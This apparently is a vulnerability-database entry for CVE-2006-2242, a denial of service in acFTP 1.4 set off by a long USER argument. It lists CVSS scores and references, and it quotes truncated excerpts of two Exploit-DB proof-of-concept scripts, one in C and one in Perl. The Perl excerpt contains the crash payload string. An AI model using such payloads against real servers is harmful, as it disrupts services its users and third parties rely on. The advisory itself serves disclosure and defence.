CVE-2006-2242
Published 2006-05-09

CVE-2006-2242: acFTP 1.4 allows remote attackers to cause a denial of service (application crash) via a long string with "{" (brace) characters to the USER command.
Priority P4 17 | medium | 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 3.74% (88.5th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acftp | acftp | — | — |
No detection rules found.
Exploit-DB
acFTP FTP Server 1.4 - 'USER' Remote Denial of Service
exploitdb·2006-05-06
---
```c
/**
Exploit for : acFTP 1.4 DoS Exploit
Advisory : http://secunia.com/advisories/19978/
Coder : Omnipresent
Email : [email protected]
Description : Preddy has discovered a vulnerability in acFTP, which can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error within the handling of the argument passed to the
"USER" command. This can be exploited to crash the FTP server via an overly long argument that
contains certain character sequences.
The vulnerability has been confirmed in version 1.4. Other versions may also be affected.
Date: 05/06/2006 - M/D/Y
**/
#ifdef _WIN32
#include
SOCKET sock;
WSADATA wsaData;
WORD wVersionRequested;
#else
#include
#include
#define I
```
Exploit-DB
acFTP FTP Server 1.4 - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2006-05-04
---
```perl
################################################
#===== acFtpd BoF Crash Exploit =====
#
# There is a Buffer overflow at the
# USER command in acFtpd.
#
# Vuln found by: Preddy
# RootShell Security Group
#
# Usage: ac_dos.pl
################################################
use IO::Socket;
use Win32;
use strict;
my($i) = "";
my($socket) = "";
my $overflow = "A{" x 4700;
if($ARGV[0] == "")
{
print "################################################\n";
print "# ===== acFtpd BoF Crash Exploit =====\n";
print "#\n";
print "# Vuln found by: Preddy\n";
print "# RootShell Security Group\n";
print "# www.rootshell-security.net\n";
print "#\n";
print "# Usage ac_dos.pl \n";
print "################################################\n";
```
No writeups or analysis indexed.
- http://secunia.com/advisories/19978
- http://www.osvdb.org/25278
- http://www.securityfocus.com/bid/17855
- http://www.vupen.com/english/advisories/2006/1674
- https://exchange.xforce.ibmcloud.com/vulnerabilities/26258
- https://www.exploit-db.com/exploits/1749